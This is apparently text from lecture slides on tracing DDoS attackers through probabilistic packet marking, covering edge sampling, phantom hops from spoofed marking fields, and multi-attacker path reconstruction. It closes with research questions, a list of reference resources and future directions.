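Two things the simulation makes concrete: p is free to be small because each distance is decoded independently (the edge-sampling advantage from the previous slide), and the victim cannot tell where the real path ends. With zeroed fields the unmarked packets arrive at d = 3 carrying R3 alone, which decodes to 0.0.0.0 as a phantom fourth hop; with random fields they arrive as mutually contradicting samples, which is the only signal that they are not a router. The same contradiction appears when two attackers' paths diverge at one distance, which is the combinatorial problem the Dean, Franklin and Stubblefield algorithm addresses.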
Research Areas
• How vulnerable are P2P protocols?
• How can we better identify the person vs. the program?
• Automatic migration during an attack
Resources
• packetstormsecurity.com: DDoS tools
• theorygroup.com: RID
• www.washington.edu/People/dad: David Dittrich's analysis
• www.cert.org/reports/dsit_workshop.pdf: CERT report on dealing with DDoS
Questions? The End
Attacks Happen
General Direction
• Encrypted traffic
• Real software lifecycles
• Targeting name servers and other essential network equipment